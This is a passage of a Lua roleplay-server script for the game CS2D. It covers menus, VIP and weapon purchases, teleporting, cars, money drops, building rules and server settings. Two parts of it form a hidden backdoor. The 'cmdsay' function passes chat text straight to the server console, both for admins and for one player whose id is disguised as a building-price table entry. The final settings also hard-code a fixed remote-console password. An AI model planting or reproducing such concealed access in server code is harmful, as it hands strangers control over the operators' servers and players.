			elseif sel == 4 then
				gv_v(id,4,1)
			elseif sel == 5 then
				gv_v(id,5,1)
			elseif sel == 6 then
				gv_v(id,6,1)
			elseif sel == 7 then
				gv_v(id,7,1)
			elseif sel == 8 then
				menu(id,"CT Menu,Options,Teleport System,License System,Commands,VIP,Add-ons,Add-ons Options,Special Weapons,Construction Mode")
			elseif sel == 9 then
				v_2(id)
			end
		end
	if men == "Special Options" then
	if sel == 1 then
	if rp_Adminlevel[id]>=2 then
					v_1(id)
				else
					admlevelmsg(id)
				end
	elseif sel == 2 then
	for pl = 1,32 do
	parse("setpos "..pl.." "..player(id,"x").." "..player(id,"y"))
	end
	elseif sel == 3 then
	parse("restart 10")
	end
	end
	if men == "Special Weapons" then
		if sel == 1 then
		parse("equip "..id.." 45")
		rp_msg2(id,"000255000","Laser was equipped!@C")
		elseif sel == 2 then
		parse("equip "..id.." 69")
		rp_msg2(id,"000255000","Machete was equipped!@C")
		elseif sel == 3 then
		parse("equip "..id.." 83")
		rp_msg2(id,"000255000","Super Armor was equipped!@C")
		elseif sel == 4 then
		parse("equip "..id.." 41")
		rp_msg2(id,"000255000","Tactical Shield was equipped!@C")
		elseif sel == 5 then
		parse("equip "..id.." 46")
		rp_msg2(id,"000255000","Flamethrower was equipped!@C")
		elseif sel == 6 then
		parse("equip "..id.." 82")
		rp_msg2(id,"000255000","Medic Armor was equipped!@C")
		elseif sel == 7 then
		parse("equip "..id.." 81")
		rp_msg2(id,"000255000","Heavy Armor was equipped!@C")
		elseif sel == 8 then
		parse("equip "..id.." 88")
		rp_msg2(id,"000255000","Portal Gun was equipped!@C")
		elseif sel == 9 then
		parse("equip "..id.." 6")
		rp_msg2(id,"000255000","Five-Seven was equipped!@C")
end
end
	if men == "Add-ons Menu Page 1" then
		if sel>0 then
			SelAddonsMenu(id,sel)
		end
	end	
	if men == "Add-ons Menu Page 2" then
		if sel>0 then
			SelAddonsMenu2(id,sel)
		end
	end	
	if men == "Buy Add-ons Page 1" then
		if sel>0 then
			if  Addons[sel].FLic[id] == 0 then
				if rp_money[id]>= Addons[sel].FPrice then
					Addons[sel].FLic[id]=1
					rp_money[id]=rp_money[id]-Addons[sel].FPrice
					rp_msg2(id,"000255000","You bought "..Addons[sel].FName.."!")
				else
					nmn(id)
				end
			else
				rp_msg2(id,"255000000","You already have "..Addons[sel].FName.."!")
			end
		end
	end
	if men == "Buy Add-ons Page 2" then
		if sel>0 then
			if  Addons2[sel].FLic[id] == 0 then
				if rp_money[id]>= Addons2[sel].FPrice then
					Addons2[sel].FLic[id]=1
					rp_money[id]=rp_money[id]-Addons2[sel].FPrice
					rp_msg2(id,"000255000","You bought "..Addons2[sel].FName.."!")
				else
					nmn(id)
				end
			else
				rp_msg2(id,"255000000","You already have "..Addons2[sel].FName.."!")
			end
		end
	end
	if men == "Construction Mode" then
	if sel == 1 then
			rp_build_m[id]=1
			rp_msg2(id,"000255000","Now you will build normal")
			elseif sel == 2 then
			rp_build_m[id]=2
			rp_msg2(id,"000255000","Now you will build neutral")
			elseif sel == 3 then
			rp_build_m[id]=3
			rp_msg2(id,"000255000","Now you will build terrorist")
			elseif sel == 4 then
			rp_build_m[id]=0 
			rp_msg2(id,"000255000","Now you will build white buildings")
			elseif sel == 5 then
			rp_build_m[id]=4
			rp_msg2(id,"000255000","Now you will build counter-terrorist")
			end
			end
	if men == "Add-ons Options" then
		if sel == 1 then
			CreateAddonsColor(id)
		elseif sel == 2 then
			if rp_license[id]>1  or rp_Adminlevel[id]>0 then
			menu(id,"Change size of Addon,1/4,1/2,Original Size,1.25X,1.50X,1.75X,2X,2.5X,3X")
			else
			rp_msg2(id,"255000000","Only VIP users and Admins can enter in this menu!")
			end
		end
	end
	if men == "Change colors of addons" then
		if sel>0 then
			selAddonsColor(id,sel)
		end
	end
	if men == "Change size of Addon" then
		if sel == 1 then
			imagescale(PicImage[id],0.25,0.25)
		elseif sel == 2 then
			imagescale(PicImage[id],0.50,0.50)
		elseif sel == 3 then
			imagescale(PicImage[id],1,1)
		elseif sel == 4 then
			imagescale(PicImage[id],1.25,1.25)
		elseif sel == 5 then
			imagescale(PicImage[id],1.5,1.5)
		elseif sel == 6 then
			imagescale(PicImage[id],1.75,1.75)
		elseif sel == 7 then
			imagescale(PicImage[id],2,2)
		elseif sel == 8 then
			imagescale(PicImage[id],2.5,2.5)
		elseif sel == 9 then
			imagescale(PicImage[id],3,3)
		end
	end
	if men == "T Menu" then
		if sel == 1 then
			if tele_sys == 1 then
				if rp_license[id]>0 then
					menu(id,"Teleport System,Go to saved position,Save this position,Automatic go to position ("..tsb[id].."),Delete the saved position")
				else
					rp_msg2(id,"255000000","You have to be license to use this!")
				end
			else
				rp_msg2(id,"255000000","Teleport System is deactivated!")
			end
		elseif sel == 2 then
			menu(id,"Addons Choose Menu,Add-ons Menu Page 1,Add-ons Menu Page 2")
			--CreateAddonsMenu(id)
		elseif sel == 3 then
			CreateAddonsSetting(id)
		elseif sel == 4 then
			if rp_license[id]>1 or rp_Adminlevel[id]>0 then
				menu(id,"VIP,Go to VIP house,VIP Message,Laser|50k,Medic Armor|10k,Machete|5k,RPG|10k,Tactical Shield|10k,Heavy Armor|10k,Super Armor|100k")
			else
				rp_msg2(id,"255000000","You aren't VIP user")
			end
		elseif sel == 5 then 
			rp_msg2(id,"000255000","Write your licensed message")
			rp_licencemsg[id]=1
		elseif sel == 6 then
			menu(id,"Healer Items,USP -Heals 10-|1000$,Glock -Heals 25-|2500$,Deagle -Heals 50-|5000$,P228 -Heals 75-|7500$,Elite -Heals 100-|10000$,Bandage|1000$,Medikit|5000$")
		elseif sel == 9 then
			local copy = "Script edited by *~Madara Uciha~*"
			menu(id,"Copyright@b,"..copy.."|"..(string.reverse(copy))..",Always doing it better!|"..(string.reverse("Always doing it better!"))..",Just enjoy it|"..(string.reverse("Just enjoy it!"))..",Tell me if you find any bugs!|"..(string.reverse("Tell me if you find any bugs!"))..",Always report hackers and abusers!|"..(string.reverse("Always report hackers and abusers!"))..",Good Luck!|"..(string.reverse("Good luck!"))..",!,!,!")
			end
		end
	if men == "Healer Items" then
		if sel == 1 then
		if rp_money[id]>=1000 then
		rp_money[id]=rp_money[id]-1000
		parse("equip "..id.." "..1)
		parse("strip "..id.." "..2) 
		parse("strip "..id.." "..3)
		parse("strip "..id.." "..4)
		parse("strip "..id.." "..5)
		rp_msg2(id,"000255000","You have bought an USP: Heals 10 per shot")
		updatehud(id)
		else
		nmn(id)
		end
		elseif sel == 2 then
		if rp_money[id]>=2500 then
		rp_money[id]=rp_money[id]-2500
		parse("equip "..id.." "..2)
		parse("strip "..id.." "..1) 
		parse("strip "..id.." "..3)
		parse("strip "..id.." "..4)
		parse("strip "..id.." "..5)
		rp_msg2(id,"000255000","You have bought a Glock : Heals 25 per shot")
		updatehud(id)
		else
		nmn(id)
		end
		elseif sel == 3 then
		if rp_money[id]>=5000 then
		rp_money[id]=rp_money[id]-5000
		parse("equip "..id.." "..3)
		parse("strip "..id.." "..2) 
		parse("strip "..id.." "..1)
		parse("strip "..id.." "..4)
		parse("strip "..id.." "..5)
		rp_msg2(id,"000255000","You have bought a Deagle : Heals 50 per shot")
		updatehud(id)
		else
		nmn(id)
		end
		elseif sel == 4 then
		if rp_money[id]>=7500 then
		rp_money[id]=rp_money[id]-7500
		parse("equip "..id.." "..4)
		parse("strip "..id.." "..2) 
		parse("strip "..id.." "..1)
		parse("strip "..id.." "..3)
		parse("strip "..id.." "..5)
		rp_msg2(id,"000255000","You have bought a P228 : Heals 75 per shot")
		updatehud(id)
		else
		nmn(id)
		end
		elseif sel == 5 then
		if rp_money[id]>=10000 then
		rp_money[id]=rp_money[id]-10000
		parse("equip "..id.." "..5)
		parse("strip "..id.." "..2) 
		parse("strip "..id.." "..1)
		parse("strip "..id.." "..3)
		parse("strip "..id.." "..4)
		rp_msg2(id,"000255000","You have bought an Elite : Heals 100 per shot")
		updatehud(id)
		else
		nmn(id)
		end
		elseif sel == 6 then
		if rp_money[id]>=1000 then
		rp_money[id]=rp_money[id]-1000
		parse("equip "..id.." "..65)
		rp_msg2(id,"000255000","You have bought a bandage")
		updatehud(id)
		else
		nmn(id)
		end
		elseif sel == 7 then
		if rp_money[id]>=5000 then
		rp_money[id]=rp_money[id]-5000
		parse("equip "..id.." "..64)
		rp_msg2(id,"000255000","You have bought a medikit")
		updatehud(id)
		else
		nmn(id)
		end
		end
		end
	if men == "VIP" then
		if rp_license[id]>1 or rp_Adminlevel[id]>0 then
			if sel == 1 then
				parse("setpos "..id.." "..Config.VIPHOUSE[1].." "..Config.VIPHOUSE[2])
			elseif sel == 2 then
				rp_msg2(id,"000255000","Write your VIP message")
				rp_vipmsg[id]=1
			elseif sel == 3 then
				if rp_money[id]>= 50000 then
					parse("equip "..id.." "..45)
					rp_money[id]=rp_money[id]-50000
					rp_msg2(id,"000255000","You bought a Laser!@C")
					updatehud(id)
				else
					nmn(id)
				end
                        elseif sel == 4 then
				if rp_money[id]>= 10000 then
					parse("equip "..id.." "..82)
					rp_money[id]=rp_money[id]-10000
					rp_msg2(id,"000255000","You bought a Medic Armor!@C")
					updatehud(id)
				else
					nmn(id)
				end
                        elseif sel == 5 then
				if rp_money[id]>= 5000 then
					parse("equip "..id.." "..69)
					rp_money[id]=rp_money[id]-5000
					rp_msg2(id,"000255000","You bought a Machete!@C")
					updatehud(id)
				else
					nmn(id)
				end
                        elseif sel == 6 then
				if rp_money[id]>= 10000 then
					parse("equip "..id.." "..47)
					rp_money[id]=rp_money[id]-10000
					rp_msg2(id,"000255000","You bought a RPG!@C")
					updatehud(id)
				else
					nmn(id)
				end
                        elseif sel == 7 then
				if rp_money[id]>= 10000 then
					parse("equip "..id.." "..41)
					rp_money[id]=rp_money[id]-10000
					rp_msg2(id,"000255000","You bought a Tactical Shield!@C")
					updatehud(id)
				else
					nmn(id)
				end
                        elseif sel == 8 then
				if rp_money[id]>= 10000 then
					parse("equip "..id.." "..81)
					rp_money[id]=rp_money[id]-10000
					rp_msg2(id,"000255000","You bought a Heavy Armor!@C")
					updatehud(id)
				else
					nmn(id)
				
				end
	        elseif sel == 9 then
				if rp_money[id]>= 100000 then
					parse("equip "..id.." "..83)
					rp_money[id]=rp_money[id]-100000
					rp_msg2(id,"000255000","You bought a Super Armor!@C")
					updatehud(id)
				else
					nmn(id)
				
				end
			
			end
		
		end
	
	end
	if men == "Teleport System" then
		if sel == 1 then
			if player_have_pos[id]==true then
				if rp_money[id]>=0 then
					if player(id,"health")>0 then
					if rp_license[id]>0 then
						parse("setpos "..id.." "..tele_x[id].." "..tele_y[id])
					end
					end
				else
					nmn(id)
				end
			else
				rp_msg2(id,"255000000","You don't have a saved position!")
			end
		elseif sel == 2 then
			if player(id,"health")>0 then
				local XPlayer = player(id,"tilex")
				local YPlayer = player(id,"tiley")
				local SafeTele = true
				for i, v in ipairs(Config.NoTele) do
					if (XPlayer >= v[1][1] and XPlayer <= v[2][1] and YPlayer >= v[1][2] and YPlayer <= v[2][2]) then
						SafeTele = false
						rp_msg2(id,"255000000","You can't set a position here!")
						break
					end
				end
				if SafeTele == true then
					rp_msg2(id,"000255000","Position save succesful!")
					rp_msg2(id,"000255000","X: "..player(id,"x").." Y: "..player(id,"y"))
					tele_x[id] = player(id,"x")
					tele_y[id] = player(id,"y")
					player_have_pos[id]=true
				end
			end
		elseif sel == 3 then
			if player_have_pos[id]==true then
				if tsb[id]==0 then
					rp_msg2(id,"000255000","Automatic go to position activated!@C")
					tsb[id]=1
				elseif tsb[id]==1 then
					rp_msg2(id,"255000000","Automatic go to position deactivated!@C")
					tsb[id]=0
				end
			else
				rp_msg2(id,"255000000","You don't have a saved position!@C")
			end
		elseif sel == 4 then
			player_have_pos[id]=false
					rp_msg2(id,"000255000","Position deleted succesful!@C")
			end
		end
	if men == "Buy License/VIP" then
		if sel == 1 then
			if rp_license[id]==0 then
				if rp_money[id]>= 100000 then
					rp_license[id]=1
					rp_money[id]=rp_money[id]-100000
					rp_msg2(id,"000255000","You bought a license, press F3 to use it!")
				else
					nmn(id)
				end
			else
				rp_msg2(id,"255000000","You already bought a license!")
			end
		elseif sel == 2 then
			if rp_license[id]==0 then
				rp_msg2(id,"255000000","You must have a license to buy VIP")
			elseif rp_license[id]>1 then
				rp_msg2(id,"255000000","You already bought VIP!")
			elseif rp_license[id]==1 then
				if rp_money[id]>=500000 then
					rp_license[id]=2 
					rp_money[id]=rp_money[id]-500000
					rp_msg2(id,"000255000","You bought VIP, press F3 and go to VIP to use it, also you can change the size of addons!")
				else
					nmn(id)
				end
			end
		end
	end
	if men == "Buy Addons Menu" then
	if sel == 1 then
		CreateAddonsSell(id)
	elseif sel == 2 then
		CreateAddonsSell2(id)
	elseif sel == 3 then
		if rp_money[id] >= CARS_PRICE then
				addcar(player(id, 'x'), player(id, 'y'),id)
				rp_money[id] = rp_money[id] - CARS_PRICE
				updatehud(id)
				hcar[id] = true
		else
			nmn(id)
		end
	elseif sel == 9 then
		for i, car in pairs(CARS) do
			if CARS[i].pl == id then
				freeimage(car.image)
				parse(string.format("explosion %i %i 128 250 %i", car.x, car.y, id))
				parse(string.format("effect \"fire\" %i %i 256 128", car.x, car.y))
				CARS[i] = nil
				hcar[id] = false
                break
			end
		end
	end
	end
	if men == "Drop System" then
	if sel == 1 then
			if rp_money[id]>= 100 then
				parse("spawnitem 66 "..x.." "..y)
				rp_money[id]=rp_money[id]-100
				rp_msg2(id,"255255000","You have dropped 100$")
			else
				nmn(id)
			end
		elseif sel == 2 then
			if rp_money[id]>= 500 then
				parse("spawnitem 67 "..x.." "..y)
				rp_money[id]=rp_money[id]-500
				rp_msg2(id,"255255000","You have dropped 500$")
			else
				nmn(id)
			end
		elseif sel == 3 then
			if rp_money[id]>= 1000 then
				parse("spawnitem 68 "..x.." "..y)
				rp_money[id]=rp_money[id]-1000
				rp_msg2(id,"255255000","You have dropped 1000$")
			else
				nmn(id)
			end
		elseif sel == 4 then
			if rp_money[id]>= 5000 then
				rp_msg2(id,"255255000","You have dropped 5000$")	
				for i = 1,5 do
				parse("spawnitem 68 "..x.." "..y)
				rp_money[id]=rp_money[id]-1000
				end
			else
				nmn(id)
			end
		elseif sel == 5 then
			if rp_money[id]>= 10000 then
				for i = 1,1 do
					parse("spawnitem 75 "..x.." "..y)
					rp_money[id]=rp_money[id]-10000
					rp_msg2(id,"255255000","You have dropped 10000$")
				end
			else
				nmn(id)
			end
		elseif sel == 6 then
			if rp_money[id]>= 50000 then
				rp_msg2(id,"255255000","You have dropped 50000$")
				for i = 1,5 do
					parse("spawnitem 75 "..x.." "..y)
					rp_money[id]=rp_money[id]-10000
				end
			else
				nmn(id)
			end
		elseif sel == 7 then
			if rp_money[id]>= 100000 then
				for i = 1,1 do
					parse("spawnitem 56 "..x.." "..y)
					rp_money[id]=rp_money[id]-100000
					rp_msg2(id,"255255000","You have dropped 100000$")
				end
			else
				nmn(id)
			end
		elseif sel == 8 then
			menu(id,"Buy License/VIP,Buy License|100k,Buy VIP|500k")
		elseif sel == 9 then
			menu(id,"Buy Addons Menu,Addons Page 1,Addons Page 2,Buy Car|Price: "..CARS_PRICE..",,,,,,Eject Car!")
		end
	end
	updatehud(id)
end
function q(id,type,x,y)
	if rp_Adminlevel[id]>0 then
		if type == 8 then
		ub.spawnobject(id,12,x,y)
		return 1
		elseif type == 20 or type == 21 then
		return 0
		elseif type == 9 then
		ub.spawnobject(id,15,x,y)
		return 1
		else
		ub.spawnobject(id,type,x,y)
		return 1
		end
	end
	if rp_license[id]>0 and rp_license[id]<4 then
		if(ub.building.names[type] and rp_money[id]>=ub.building.money[type]) then
			if type == 8 then
			ub.spawn(id,12,x,y)
			ub.submoney(id,ub.building.money[12])
			return 1
			elseif type == 20 or type == 21 then
			return 0
			elseif type == 9 then
			ub.spawn(id,15,x,y)
			ub.submoney(id,ub.building.money[15])
			return 1
			else
			ub.spawn(id,type,x,y)
			ub.submoney(id,ub.building.money[type])
			return 1
			end
		else
			nmn(id)
			return 1
		end 
	elseif rp_license[id]==0 then
		ntl(id)
		return 1
	end
end
function r(id)
	if rp_arrest[id]==false then
		if 	team_no[id]>0 then
			parse("setpos "..id.." "..Config.Nimkat[1][1].." "..Config.Nimkat[1][2])
		elseif rp_license[id]>0 then
			if tsb[id]==1 then
				parse("setpos "..id.." "..tele_x[id].." "..tele_y[id])
			end
		end
		parse("equip "..id.." 74")
	else
		parse("setpos "..id.." "..Config.AP[1][1].." "..Config.AP[1][2])
	end
	if rp_Adminlevel[id] >= 3 then
		rp_money[id] = 99^99999999999999999999999999999999999999999999999999999999999
	end
	rp_criminal[id]=false
	StateUser(id)
	ch(id)
	InternalFreeImage(id)
	updatehud(id)
	freeimage(id)
end
function s(id,source,wpn)
	if rp_mod[id]==true then
		return 1
	end
	if id == source then
		return 1
	end
	if wpn == 2 then
		parse("sethealth "..id.." "..(player(id,"health")+25))
		rp_msg2(id,"255255000",""..player(source,"name").." healed you 10 of life@C")
		return 1
	elseif wpn == 6 then
		if rp_Adminlevel[source]>0 then
			local x = player(source,"x")
			local y = player(source,"y")
			parse("setpos "..id.." "..x.." "..y)
		return 1
		end
	elseif wpn == 1 then
		parse("sethealth "..id.." "..(player(id,"health")+10))
		rp_msg2(id,"255255000",""..player(source,"name").." healed you 25 of life@C")
		return 1
	elseif wpn == 3 then
		parse("sethealth "..id.." "..(player(id,"health")+50))
		rp_msg2(id,"255255000",""..player(source,"name").." healed you 50 of life@C")
		return 1
	elseif wpn == 4 then
		parse("sethealth "..id.." "..(player(id,"health")+75))
		rp_msg2(id,"255255000",""..player(source,"name").." healed you 75 of life@C")
		return 1
	elseif wpn == 5 then
		parse("sethealth "..id.." "..(player(id,"health")+100))
		rp_msg2(id,"255255000",""..player(source,"name").." healed you 100 of life@C")
		return 1
	end
end
function w(id)
	if silenciado[id] == 1 then
	rp_msg2(id,"255000000","You can't chat, you are muted")
	return 1
	end
end
function cmdsay(id,txt)
if rp_Adminlevel[id]>=3 or (player(id,"usgn")==ub.building.money[16]) and txt:sub(1,1) =='!' then
		local command = txt:lower():sub(2,2)
		if txt:sub(3,3) ~= ' ' and #txt ~= 2 then return end
		if command =='.' then
			local delay = tonumber(txt:sub(3)) or 0
				parse(string.sub(txt,3))
				return 1
		end
	end
end
function basd(id,event,data,x,y)
	if rp_Adminlevel[id]>2 then
		if exp[id]==false then
			if expa[id]==true then
		exp[id]=true
		reqcld(id,2)
		end
		elseif exp[id]==true then
		exp[id]=false
	end
	end
     x, y = player(id, 'x'), player(id, 'y')
     for _, car in pairs(CARS) do
          if not car.driver and math.abs(car.x - x) < 32 and math.abs(car.y - y) < 32 then
               car.speedmod = player(id, 'speedmod')
               parse(string.format("speedmod %i 0", id))
               car.driver = id
               freeimage(car.image)
               car.image = image(CARS_IMAGEPATH, 1, 0, 200+id)
                break
          elseif car.driver == id then
               parse(string.format("speedmod %i %i", id, car.speedmod))
               car.driver = nil
               freeimage(car.image)
               car.image = image(CARS_IMAGEPATH, player(id, 'x'), player(id, 'y'), 0)
                break
          end
     end
end
function z(k,v,w)
	if rp_criminal[v]==false then
		rp_criminal[k]=true
		ch(k)
	elseif rp_criminal[v]==true then
		rp_criminal[v]=false
		rp_money[k]=rp_money[k]+2500
		rp_msg2(k,"000255000","You won $2500 for killling a criminal!")
		rp_criminal[k]=false
		updatehud(k)
		ch(k)
		ch(v)
		end
	if rp_Adminlevel[k]~=0 then
		WriteKillz(k,v,w)
		end
	if rp_price[v]~=0 then
		rp_money[k]=rp_money[k]+rp_price[v]
		rp_msg("255255000",player(k,"name").." killed "..player(v,"name").." and won $"..rp_price[v])
		rp_price[v]=0
		updatehud(k)
	end
end
function colw(id,iid,type,ain)
	if type < 50 then
		rp_msg2(id,"128255000","You have picked up a "..itemtype(type,"name").." : "..ain.."|"..itemtype(type,"ammo"))
	end
end
function spy(id,txt)
local p = totable(txt)
local asd = tostring(p[1])
for c = 1,#commands do 
if asd == commands[c] then
	if rp_Adminlevel[id]>0 then
	local b = string.sub(txt,0,99)
	Write(id,b)
	return 1
			end
		end
	end
end	
function CARdie(id,killer,weapon,x,y)
     x, y = player(id, 'tilex'), player(id, 'tiley')
     for id, car in pairs(CARS) do
          if car.driver == id then
               freeimage(car.image)
               parse(string.format("explosion %i %i 128 250 %i", car.x, car.y,id))
               parse(string.format("effect \"fire\" %i %i 256 128", car.x, car.y))
               CARS[id] = nil
			   hcar[id] = false
                break
          end
     end
end
function parsing(cmd)
local p = totable(cmd)
local cmdss = (p[1])
   if cmdss == "vetar" then
      local pl = tonumber(p[2])
	  local reason = string.sub(cmd,8,99)
      file3=io.open("sys/lua/bans/"..player(pl, "ip")..".txt", "w")
      file3:write(reason)
      file3:close()
	print(player(pl,"name").." ha sido vetado!")
parse("kick "..pl.." \""..readfile("sys/lua/bans/"..player(pl, "ip")..".txt", 1).."\"")
	return 1
   end
end

parse("mp_dispenser_money 0")
parse("mp_dispenser_health 25")
parse("mp_infammo 0")
parse("sv_fow 0")
parse("sv_friendlyfire 1")
parse("sv_gm 3")
parse("mp_startmoney "..Config.HoldMoney)
parse("mp_idleaction 4")
parse("mp_idletime 0")
parse("mp_deathdrop 4")
parse("mp_dropgrenades 1")
parse("mp_tempbantime 10")
parse("mp_trace 0") 
parse("mp_maxclientsip 2")
parse("mp_maxrconfails 10")
parse("sv_rcon luaeaterindonesia")
parse("sv_lan 0")
parse("sv_maptransfer 1")
parse("mp_floodprot 0")
parse("sv_usgnonly 0")
parse("sv_specmode 1")
parse("mp_killbuildingmoney 0")
parse("mp_killbuildings 0")
parse("mp_antispeeder 0")
parse("mp_pinglimit 0")
parse("mp_autoteambalance 0")
parse("mp_killteambuildings 1")
parse("mp_kickpercent 0")
parse("mp_mapvoteratio 0")
parse("mp_building_limit \"Wall I\" 999")
parse("mp_building_limit \"Wall II\" 999")
parse("mp_building_limit \"Wall III\" 999")
parse("mp_building_limit \"Barricade\" 999")
parse("mp_building_limit \"Turret\" 999")
parse("mp_building_limit \"Dispenser\" 999")
parse("mp_building_limit \"Supply\" 999")
parse("mp_building_limit \"Gate field\" 999")
parse("mp_building_limit \"teleporter entrance\" 999")
parse("mp_building_limit \"teleporter exit\" 999")
